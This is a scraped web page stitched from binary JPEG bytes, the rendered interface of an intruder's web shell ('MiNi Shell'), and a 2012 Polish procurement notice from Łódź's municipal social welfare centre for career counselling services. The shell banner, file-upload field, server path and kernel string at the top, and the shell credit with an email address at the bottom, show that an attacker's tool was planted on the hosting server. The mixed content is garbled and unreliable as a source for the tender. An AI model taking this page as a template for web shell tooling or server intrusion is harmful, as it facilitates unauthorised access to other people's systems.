JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120605/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120605/187880-N-2012.html

<p class="kh_header"><b>Łódź: Przeprowadzenie doradztwa zawodowego dla beneficjentów ostatecznych projektu systemowego PO KL 7.1.1. Nowy obraz pomocy społecznej w Łodzi.</b><br>
<b>Numer ogłoszenia: 187880 - 2012; data zamieszczenia: 05.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Łodzi , ul. Piotrkowska 149, 90-440 Łódź, woj. łódzkie, tel. 0-42 6324034, faks 0-42 6324130.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie doradztwa zawodowego dla beneficjentów ostatecznych projektu systemowego PO KL 7.1.1. Nowy obraz pomocy społecznej w Łodzi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest przeprowadzenie doradztwa zawodowego dla beneficjentów ostatecznych projektu systemowego PO KL 7.1.1Nowy obraz pomocy społecznej w Łodzi.
Przedmiot zamówienia obejmuje:
-   przeprowadzenie doradztwa zawodowego dla 1100 uczestników projektu Nowy obraz pomocy społecznej w Łodzi.
Doradztwo zawodowe indywidualne - obejmuje nakreślenie ścieżki kariery oraz wytyczenie celów w trakcie indywidualnych spotkań.
Czas trwania: 5 godzin na osobę z podziałem na 2 spotkania po 2,5 godz., dla 1100 osób podopiecznych Miejskiego Ośrodka Pomocy Społecznej w Łodzi, w tym 110 osób niepełnosprawnych i 100 wychowanków placówek opiekuńczo-wychowawczych lub rodzin zastępczych, będących beneficjentami ostatecznymi projektu systemowego PO KL 7.1.1. Nowy obraz pomocy społecznej w Łodzi.
Do zadań doradcy zawodowego należy: wspomaganie w odnalezieniu indywidualnego potencjału uczestnika projektu, wspólne nakreślenie ścieżki kariery i wytyczenie celów krótkoterminowych i długoterminowych, zbadanie motywacji do zmian, preferencji zawodowych, przeprowadzenie ćwiczeń, dzięki którym beneficjent będzie miał możliwość dojścia do własnej wizji kariery zawodowej, wytyczenie konkretnych działań zmierzających do realizacji indywidualnej ścieżki kariery, przygotowanie indywidualnego planu działania. 
Doradca zawodowy w procesie doradztwa opracuje kartę usług doradczych oraz IPD według wzoru Zamawiającego. Każda osoba uczęszczająca na doradztwo powinna podpisać indywidualną listę obecności, którą wraz z karta doradczą i IPD Wykonawca przekaże Zamawiającemu.
Czas realizacji: do 30 października 2012 r.
Organizacja szkolenia: Zamawiający wymaga, aby doradztwo organizowane było na terenie miasta Łodzi. Wymagane jest aby doradztwo zawodowe odbywało się w sali lub pokoju, którzy gwarantuje indywidualny charakter rozmowy i spotkania uczestnika z doradcą zawodowym. 
Zamawiający wymaga, aby zajęcia organizowane były w 5 lokalizacjach: 
- w rejonie  obejmującym swym zasięgiem terytorialnym Centrum Obsługi Mieszkańców  dzielnicy Bałuty i tutaj Zamawiający zamierza skierować na szkolenie ok. 200 osób; 
- w rejonie  obejmującym swym zasięgiem terytorialnym Centrum Obsługi Mieszkańców dzielnicy Górna i tutaj Zamawiający zamierza skierować na szkolenie ok. 200 osób;
- w rejonie obejmującym swym zasięgiem terytorialnym Centrum Obsługi Mieszkańców  dzielnicy Widzew i tutaj Zamawiający zamierza skierować na szkolenie ok. 200 osób;
- w rejonie obejmującym swym zasięgiem terytorialnym Centrum Obsługi Mieszkańców  dzielnicy Polesie i tutaj Zamawiający zamierza skierować na szkolenie ok. 200 osób;
- w rejonie obejmującym swym zasięgiem terytorialnym Centrum Obsługi Mieszkańców  dzielnicy Śródmieście i tutaj Zamawiający zamierza skierować na szkolenie ok. 300 osób.
Wśród, osób zrekrutowanych w rejonie obejmującym swym zasięgiem terytorialnym COM  dzielnicy Śródmieście będzie 100 wychowanków placówek opiekuńczo wychowawczych, dla których Wykonawca zorganizuje doradztwo w rejonie COM Śródmieście, w dni robocze od 15:00 do 20:00 oraz dopuszcza się możliwość organizacji doradztwa dla tej grupy osób
w soboty od 8:00 do 16:00.
Kwalifikacje kadry: Zamawiający wymaga, aby doradztwo zawodowe prowadzone było przez osobę posiadającą wykształcenie wyższe i uprawnienia do wykonywania zawodu poprzez licencję doradcy zawodowego wydaną przez Urząd Wojewódzki. 
Do oferty należy dołączyć kopię aktualnego zaświadczenia z Urzędu Wojewódzkiego potwierdzonego za zgodność przez Wykonawcę i doradcę zawodowego. Do oferty należy dołączyć oryginały umów lub oświadczeń o dysponowaniu lokalami.
Dodatkowe wymagania:
1)  doradztwa muszą zostać zrealizowane zgodnie z następującymi zasadami:
- zajęcia nie mogą rozpoczynać się wcześniej niż o godz. 8:00, a kończyć później niż o godz. 20:00, 
- wyjątek stanowi grupa osób - 100 wychowanków placówek opiekuńczo-wychowawczych, dla których zajęcia od poniedziałku do piątku muszą odbywać się w godzinach 15:00-20:00. Zamawiający dopuszcza wyjątkowo możliwość organizacji szkoleń dla tej grupy osób w soboty i niedziele od 8:00 do 16:00.
- Wykonawca opracuje w terminie 3 dni od podpisania umowy harmonogram spotkań z beneficjentami zawierający w szczególności rozbicie na poszczególne dni, godziny wraz z podaniem nazwisk osób prowadzących doradztwo.
2) W ramach realizacji doradztwa wykonawca zapewni uczestnikom:
- warunki odbywania doradztwa zgodne z przepisami bezpieczeństwa i higieny pracy,
- zaplecze sanitarne i higieniczne oraz środki czystości,
- w okresie letnim wodę mineralną (500 ml na osobę w trakcie jednego spotkania),a w okresie jesiennym herbatę  lub kawę (500 ml na osobę w trakcie jednego spotkania).
3)Wykonawca zobowiązuje się zapewnić pomieszczenia z odpowiednią liczbą miejsc siedzących i stolików, z odpowiednim oświetleniem, ogrzewaniem, wentylacją, z dostępem do toalety
i bieżącej ciepłej wody.
4)Wykonawca jest zobowiązany do prowadzenia nadzoru wewnętrznego służącego podnoszeniu jakości realizowanej usługi.
5)przedmiot zamówienia jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, dlatego Wykonawca zobowiązuje się do:
a)umieszczenia logo Unii Europejskiej, Programu Operacyjnego Kapitał Ludzki m.in. na: kartach usług doradczych, IPD, listach obecności, w pomieszczeniach, w których będą się odbywać zajęcia zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki Ministerstwa Rozwoju Regionalnego z 4 lutego 2009 r.  lub aktualnych na dzień organizacji szkolenia,
b) informowania uczestników o współfinansowaniu zajęć ze środków Unii Europejskiej
w ramach Europejskiego Funduszu Społecznego.
6) Wykonawca jest zobowiązany do prowadzenia i przechowywania do dnia 
31.12.2020 r. kserokopii następującej dokumentacji z przebiegu doradztwa:
- kserokopię sporządzonych Indywidualnych Planów Działania zawierających podpis  beneficjenta, wymiar godzin i tematy zajęć,
- rejestru osób, które skorzystają z doradztwa zawodowego i w jakim wymiarze godzin oraz   listy obecności.
7) Wykonawca jest zobowiązany do podania w formularzu oferty dokładnego adresu realizacji wszystkich punktów doradztwa wraz z oryginałami umów lub oświadczeń wynajmujących.
8) Zamawiający zastrzega sobie prawo kontroli Wykonawcy w zakresie   zapewnienia odpowiednich warunków lokalowych przed rozstrzygnięciem postępowania. Ponadto:
-  nie dopuszcza się prowadzenia doradztwa drogą elektroniczną, metodą e-lerningu, w formie eksternistycznej itp,
- Wykonawca zobowiązany jest wyznaczyć osobę/y prowadzącą/e nadzór wewnętrzny nad realizacją umowy oraz do bezpośredniego kontaktowania się z Zamawiającym.
9) przedmiot zamówienia obejmuje również ubezpieczenie uczestników doradztwa od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do i z miejsca szkolenia.
10)  Zamawiający wymaga, aby zajęcia przeprowadzone były w lokalach na terenie miasta Łodzi, nie wyżej niż II piętro, z dogodnym dojazdem środkami komunikacji miejskiej. Nie dopuszcza usytuowania sal szkoleniowych w piwnicach, suterenach.
11)  Zamawiający zastrzega sobie możliwość skierowania na doradztwo mniejszej ilości osób.
12) w każdym dniu odbywania się doradztwa Wykonawca zobowiązany jest wydać uczestnikom jednorazowe bilety MPK (2 szt. dziennie; na dojazd na doradztwo oraz drogę powrotną). 
W zależności od deklarowanego przez uczestników szkolenia zapotrzebowania wydawane mogą być bilety 20-sto oraz 40-sto minutowe. Wykonawca powinien prowadzić listę potwierdzeń odbioru biletów, którą przekaże Zamawiającemu, podpisywaną przez Beneficjentów Ostatecznych.
Wymagania stawiane Wykonawcy:
1)  wymagana jest należyta staranność przy realizacji zobowiązań umowy;
2)  ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez   Zamawiającego z ustanowionym przedstawicielem Wykonawcy;
3) określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia;
4) Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez  Wykonawcę podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 10.000 zł,
słownie złotych: dziesięć tysięcy 00/100.
Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)	w pieniądzu, przelewem na rachunek bankowy: 
GETIN NOBLE Bank S.A. O/Łódź 30 1560 0013 2025 0000 0172 0007.
z adnotacją Wadium -  Przeprowadzenie doradztwa zawodowego dla beneficjentów ostatecznych projektu systemowego PO KL 7.1.1.Nowy obraz pomocy społecznej  w Łodzi;
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym;
3)  w gwarancjach bankowych;
4)  w gwarancjach ubezpieczeniowych;
5)  w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275). 
Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego. 
W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46 ustawy Prawo zamówień publicznych.
W przypadku nie zabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium Wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta zostanie odrzucona.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie spełnienia warunku posiadania uprawnień Wykonawcy powinni wykazać posiadanie wpisu do Rejestru Agencji Zatrudnienia w Wojewódzkim Urzędzie Pracy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest złożenie przez Wykonawcę wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenie dokumentu potwierdzającego, że usługi zostały wykonane należycie - Załącznik Nr 3 do SIWZ.
Uszczegółowienie:
Warunek zostanie spełniony, jeżeli Wykonawca w wyżej wymienionym okresie Wykonawca wykonał co najmniej 3 usługi dla instytucji pomocy społecznej lub Publicznych Służb Zatrudnienia, których przedmiotem było doradztwo zawodowe łącznie dla minimum 200 osób w zakresie wskazanym w opisie przedmiotu zamówienia, potwierdzone referencjami lub kopią złożonego sprawozdania do Wojewódzkiego Urzędu Pracy. 
Z zastrzeżeniem, że wykazane doświadczenie w zakresie doradztwa zawodowego musi obejmować okres, w którym Wykonawca posiadał wpis do Rejestru Agencji Zatrudnienia oraz załączył stosowne dokumenty potwierdzające należyte wykonanie tych usług - Załącznik Nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni wykazać dysponowanie co najmniej pięcioma lokalami  usytuowanymi w obrębie działania obejmującymi swym zasięgiem terytorialnym Centrum Obsługi Mieszkańców  dzielnicy : Śródmieście, Polesie, Górna, Widzew, Bałuty, z uwzględnieniem i dostosowaniem wyposażenia pomieszczeń do potrzeb realizacji doradztwa (tj. wyposażenie w sprzęt audiowizualny - projektor, ekran, flipchart, krzesła, biurko);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazanie przez Wykonawcę że dysponuje 10 doradcami zawodowymi, z których każdy  posiada doświadczenie w przeprowadzeniu co najmniej 3 usług doradczych łącznie dla co najmniej 50 osób z zakresu opisanego w przedmiocie zamówienia, w okresie maksymalnie 3 lat przed upływem terminu składania ofert.
 Uszczegółowienie:
wymagane jest złożenie przez Wykonawcę wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonywania zamówienia, a także zakresem wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi osobami - Załącznik Nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę, że posiada w całym okresie trwania umowy opłaconą polisę na kwotę nie mniej niż 100.000,00 zł, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w przypadku ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.uml.lodz.pl/ zakładka przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Łodzi
ul. Piotrkowska 149
90-440 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2012 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Łodzi
ul. Piotrkowska 149
90-440 Łódź
Sekretariat Miejskiego Ośrodka Pomocy Społecznej w Łodzi.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Nowy obraz pomocy społecznej w Łodzi współfinansowany ze środków Unii Europejskiej, z Europejskiego Funduszu Społecznego
w ramach Poddziałania 7.1.1. Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com